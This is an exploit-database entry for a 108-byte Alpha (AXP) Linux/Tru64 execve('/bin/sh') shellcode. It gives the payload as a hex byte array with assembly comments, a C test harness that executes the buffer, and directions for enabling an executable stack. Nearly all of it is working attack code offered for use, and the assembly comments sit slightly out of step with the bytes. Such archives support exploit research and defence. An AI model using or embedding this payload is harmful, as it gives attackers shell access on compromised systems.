Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)

EDB-ID:

47239

CVE:

N/A




Platform:

Linux

Date:

2019-03-25


/* Alpha (AXP) Linux/Tru64 execve() shellcode
*  ==========================================
* This shellcode uses the stack to store a generated
* "callsys" instruction, due to this it needs executable
* stack. To test on Linux use "execstack -s <bin>" and
* on Tru64 use "sysconfig -r proc executable_stack=1".
* 
* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
*
* -- Hacker Fantastic (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>

unsigned char shellcode[] = {
	"\x80\xff\xde\x23"   /* lda $sp,-128($sp)   */
	"\x73\x68\x3f\x24"   /* ldil $1, 0x68732f2f */
	"\x2f\x2f\x21\x20"   /* sll $1, 0x20        */
	"\x21\x17\x24\x48"   /* ldil $2, 0x6e69622f */
	"\x69\x6e\x5f\x24"   /* addq $1, $2, $1     */
	"\x2f\x62\x42\x20"   /* stq $31, -32($sp)   */
	"\x01\x04\x22\x40"   /* stq $31, -24($sp)   */
	"\xe0\xff\xfe\xb7"   /* stq $31, -8($sp)    */
	"\xe8\xff\xfe\xb7"   /* stq $1, -16($sp)    */
	"\xf8\xff\xfe\xb7"   /* mov $sp, $16        */
	"\xf0\xff\x3e\xb4"   /* subq $16, 0x10, $16 */
	"\x10\x04\xfe\x47"   /* stq $16, -40($sp)   */
	"\x30\x15\x02\x42"   /* mov $sp, $17        */
	"\xd8\xff\x1e\xb6"   /* subq $17, 0x28, $17 */
	"\x11\x04\xfe\x47"   /* mov $sp, $18        */
	"\x31\x15\x25\x42"   /* subq $18, 0x18, $18 */
	"\x12\x04\xfe\x47"   /* ldil $0, 0xffffff3c */
	"\x32\x15\x43\x42"   /* ldil $1, 0xffffff01 */
	"\x3c\xff\x1f\x20"   /* subq $0, $1, $0     */
	"\x01\xff\x3f\x20"   /* ldil $1, 0xffffff84 */
	"\x20\x05\x01\x40"   /* ldil $2, 0xffffff01 */
	"\x84\xff\x3f\x20"   /* subq $1, $2, $1     */
	"\x01\xff\x5f\x20"   /* stl $1, -48($sp)    */
	"\x21\x05\x22\x40"   /* subq $sp, 0x30, $sp */
	"\xd0\xff\x3e\xb0"   /* jmp $sp,($sp),0xff10 */
	"\x3e\x15\xc6\x43"
	"\xc4\x3f\xde\x6b"
};

int main(){
	int (*func)();
        func = (int (*)())shellcode;
        func();
}